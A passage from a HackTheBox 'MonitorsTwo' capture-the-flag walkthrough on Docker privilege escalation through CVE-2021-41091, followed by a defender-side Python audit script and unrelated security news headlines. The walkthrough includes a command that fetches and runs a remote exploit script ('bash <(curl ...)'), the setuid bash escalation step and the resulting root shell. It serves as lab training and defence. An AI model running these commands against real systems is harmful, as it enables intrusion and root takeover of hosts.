< Content-Type: text/plain; charset=utf-8
< 
* Connection #0 to host 127.0.0.1 left intact
404: Page Not Found

It doesn’t give me much. I can’t find any info on which process is using port 35077 with the conventional methods (netstat, lsof, etc.). After double-checking the CVEs suggested by linpeas, without any success, I started reading posts in the official HTB forum. Many users talk about SUID and Docker (things I’ve already checked, among others, but maybe not well enough at this point). So I focus on these two clues.

Files available with SUID permissions don’t help me and I can’t even launch docker commands due to lack of permissions. Searching for some exploits I find a lot of docker stuff.

Docker : Security vulnerabilities
Security vulnerabilities related to Docker : List of vulnerabilities related to any product of this vendor. Cvss scores, vulnerability details and links to full CVE details and references

The docker version available on the machine could help me identify a specific exploit.

marcus@monitorstwo:~$ docker --version
Docker version 20.10.5+dfsg1, build 55c4c88

I download the results for an easier search (fortunately it's only two pages). I import the data into an Excel file and perform a quick search based on the docker version on the BOX. Three results come out.

They are CVE-2021-41092 (execution vulnerability), CVE-2021-21285 (unknown) and CVE-2021-21284 (path traversal vulnerability).

CVE-2021-41092 inspires me: it allows command execution after a login to a personal docker registry. I look for exploits, but I can't find anything useful, and even some experiments of my own lead nowhere.
CVE-2021-21285 doesn't really work for me either: it causes the docker daemon to crash when pulling an image (which I can't do anyway, due to a lack of permissions, among other things). That leaves CVE-2021-21284, for which I can't find anything as interesting as the previous ones. After a while, I search online for other exploits on this specific version ("Docker 20.10.5 exploit"), and among the first results there is an interesting git repository.

GitHub – UncleJ4ck/CVE-2021-41091: POC for CVE-2021-41091
POC for CVE-2021-41091. Contribute to UncleJ4ck/CVE-2021-41091 development by creating an account on GitHub.

The vulnerability is not in the docker CLI but in the docker engine itself (Moby). Looking at the script and running a few commands from the BOX's shell to check whether the vulnerability is actually present, I don't get promising results, but trying costs nothing, so I download the script to my machine and then run it, as always, without leaving a trace!

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/upld]
└─$ wget https://raw.githubusercontent.com/UncleJ4ck/CVE-2021-41091/main/exp.sh                
--2023-05-20 06:09:32--  https://raw.githubusercontent.com/UncleJ4ck/CVE-2021-41091/main/exp.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2446 (2.4K) [text/plain]
Saving to: ‘exp.sh’

exp.sh                                             100%[=============================================================================================================>]   2.39K  --.-KB/s    in 0.002s  

2023-05-20 06:09:32 (1.03 MB/s) - ‘exp.sh’ saved [2446/2446]

                                                                                                                                                                                                         
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/upld]
└─$ php -S 10.10.14.78:80
[Sat May 20 06:09:35 2023] PHP 8.2.4 Development Server (http://10.10.14.78:80) started

Ready!

marcus@monitorstwo:/tmp$ bash <(curl -s http://10.10.14.78/exp.sh)
[!] Vulnerable to CVE-2021-41091
[!] Now connect to your Docker container that is accessible and obtain root access !
[>] After gaining root access execute this command (chmod u+s /bin/bash)

Did you correctly set the setuid bit on /bin/bash in the Docker container? (yes/no): yes
[!] Available Overlay2 Filesystems:
/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged

[!] Iterating over the available Overlay2 filesystems !
[?] Checking path: /var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
[x] Could not get root access in '/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged'

[?] Checking path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
[!] Rooted !
[>] Current Vulnerable Path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
[?] If it didn't spawn a shell go to this path and execute './bin/bash -p'

[!] Spawning Shell
bash-5.1# exit
marcus@monitorstwo:/tmp$ cd /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
marcus@monitorstwo:/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged$ ./bin/bash -p
bash-5.1# whoami
root
bash-5.1# ls -la /root/root.txt
-rw-r----- 1 root root 33 May 20 02:50 /root/root.txt
bash-5.1# cat /root/root.txt
6******************************6
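A defender-side check for the condition this exploit depends on, added here as an example; it is neither the walkthrough's code nor the UncleJ4ck script. It does two things: it parses the `docker --version` banner shown above and compares it with Moby 20.10.9, the first release carrying the CVE-2021-41091 fix (a fact from the upstream advisory, not from this page), and it audits a Docker data root for `overlay2/*/merged` trees that a non-root local user could traverse to reach a setuid or setgid file, which is exactly what the script's "chmod u+s /bin/bash" step plus `./bin/bash -p` relies on. The demo directory layout, the layer id `0000placeholder-layer-id`, the stand-in binaries and the directory modes are constructed for the example; 0o710 is assumed here to mirror the data-root mode the fixed engine applies, and 0o711 the pre-fix one.

```python
"""Host-side audit for CVE-2021-41091 exposure (added example, not from the walkthrough).

Two checks a defender can run on a Docker host:
  1. engine_is_patched(): is the Engine older than Moby 20.10.9, the release that
     restricted the permissions of /var/lib/docker?
  2. find_exposed_setuid(): can a non-root local user still walk into the overlay2
     'merged' trees and reach a setuid/setgid file shipped inside a container image?
"""
import os
import re
import stat
import tempfile
from pathlib import Path

# Moby 20.10.9 is the first release carrying the fix (upstream advisory, not the page).
FIXED_VERSION = (20, 10, 9)
VERSION_RE = re.compile(r"Docker version (\d+)\.(\d+)\.(\d+)")


def parse_docker_version(banner):
    """Extract (major, minor, patch) from `docker --version` output.
    Distro suffixes such as '+dfsg1' and the build id are ignored."""
    m = VERSION_RE.search(banner)
    if m is None:
        raise ValueError("unrecognised banner: %r" % banner)
    return tuple(int(x) for x in m.groups())


def engine_is_patched(banner):
    return parse_docker_version(banner) >= FIXED_VERSION


def other_can_traverse(path):
    """True when the 'other' execute bit is set, i.e. any local user may enter the directory."""
    return bool(path.stat().st_mode & stat.S_IXOTH)


def find_exposed_setuid(data_root):
    """Return setuid/setgid regular files under <data_root>/overlay2/*/merged that an
    unprivileged user could reach: every directory on the way must be traversable by 'other'.
    Mode bits are inspected directly, so the result is the same whether run as root or not."""
    data_root = Path(data_root)
    overlay = data_root / "overlay2"
    findings = []
    if not overlay.is_dir():
        return findings
    if not (other_can_traverse(data_root) and other_can_traverse(overlay)):
        return findings  # blocked at the data root: the post-fix layout
    for layer in sorted(overlay.iterdir()):
        merged = layer / "merged"
        if not merged.is_dir() or not (other_can_traverse(layer) and other_can_traverse(merged)):
            continue
        for root, dirs, files in os.walk(merged):
            # prune subtrees a non-root user could not enter
            dirs[:] = [d for d in dirs if other_can_traverse(Path(root) / d)]
            for name in files:
                p = Path(root) / name
                st = p.lstat()
                if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                    findings.append(p.relative_to(data_root).as_posix())
    return findings


def build_demo(base, restricted):
    """Constructed stand-in for /var/lib/docker (not captured from a real host).
    Only the data-root mode differs between the two layouts: 0o711 (assumed pre-fix)
    lets anyone enter, 0o710 (assumed post-fix) stops traversal at the top."""
    data_root = Path(base)
    layer = data_root / "overlay2" / "0000placeholder-layer-id"   # placeholder layer id
    bin_dir = layer / "merged" / "bin"
    bin_dir.mkdir(parents=True)
    shell = bin_dir / "bash"
    shell.write_bytes(b"#!/bin/sh\n")   # stand-in for the container's /bin/bash
    shell.chmod(0o4755)                 # setuid bit, the state 'chmod u+s /bin/bash' leaves behind
    (bin_dir / "ls").write_bytes(b"")
    (bin_dir / "ls").chmod(0o755)       # ordinary binary, must not be reported
    for d, mode in ((bin_dir, 0o755), (layer / "merged", 0o755), (layer, 0o711),
                    (data_root / "overlay2", 0o711)):
        d.chmod(mode)                   # explicit modes so the demo does not depend on umask
    data_root.chmod(0o710 if restricted else 0o711)
    return data_root


def run_demo():
    """Audit one pre-fix and one post-fix layout; returns the findings of each."""
    with tempfile.TemporaryDirectory() as td:
        exposed = build_demo(Path(td) / "prefix", restricted=False)
        fixed = build_demo(Path(td) / "postfix", restricted=True)
        return {"exposed": find_exposed_setuid(exposed), "fixed": find_exposed_setuid(fixed)}


if __name__ == "__main__":
    banner = "Docker version 20.10.5+dfsg1, build 55c4c88"   # the BOX's banner from the page
    print("engine patched:", engine_is_patched(banner))
    print(run_demo())
```

On a real host, run `find_exposed_setuid("/var/lib/docker")` as root after upgrading: a non-empty list means local users can still reach a setuid file from an image, and since the upstream advisory notes that running containers keep their old permissions until stopped and restarted, an empty list is only meaningful once every container has been recreated.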

Woooo, what a fantastic surprise, even if from the preliminary tests it didn’t seem feasible to me. Anyway, another interesting BOX indeed. As always, while waiting for another machine, have good hacking. That’s all folks.

Secjuice – Read More

These alternatives to popular apps can help reclaim your online life from billionaires and surveillance

Not every app or service is trying to monetize your personal data. Here are some of our favorite alternatives to popular apps.

© 2024 TechCrunch. All rights reserved. For personal use only.

Security News | TechCrunch – Read More

Why New York is a Prime Location for Leading Mobile Development Agencies

New York, the city that never sleeps, is renowned as a global epicentre for innovation, creativity, and business…

Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News – Read More

Andrew Tate’s University Breach: 1 Million User Records and Chats Leaked

Andrew Tate’s “The Real World” platform has been breached, again, leaking user data including emails and private chat…

Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News – Read More

Russia’s Ballistic Missile Attack on Ukraine Is an Alarming First

This is the first time Russia has used its so-called Oreshnik intermediate-range ballistic missile in combat. The launch also serves as a warning to the West.

Security Latest – Read More

The rise and fall of the ‘Scattered Spider’ hackers

The prolific hacking group broke into Caesars Entertainment, Coinbase, DoorDash, Mailchimp, Riot Games, Twilio (twice), and dozens more. 

Security News | TechCrunch – Read More

Meet three incoming EU lawmakers in charge of key tech policy areas

The European Union looks to have clinched political agreement on the team of 26 commissioners who will be implementing President Ursula von der Leyen’s policy plan for the next five years. A final vote is still pending next week, but on Thursday, Politico’s Brussels Playbook newsletter reported a deal in the European Parliament on the […]

Security News | TechCrunch – Read More

North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn

The North Korea-linked threat actor known as Sapphire Sleet is estimated to have stolen more than $10 million worth of cryptocurrency as part of social engineering campaigns orchestrated over a six-month period.
These findings come from Microsoft, which said that multiple threat activity clusters with ties to the country have been observed creating fake profiles on LinkedIn, posing as both

The Hacker News – Read More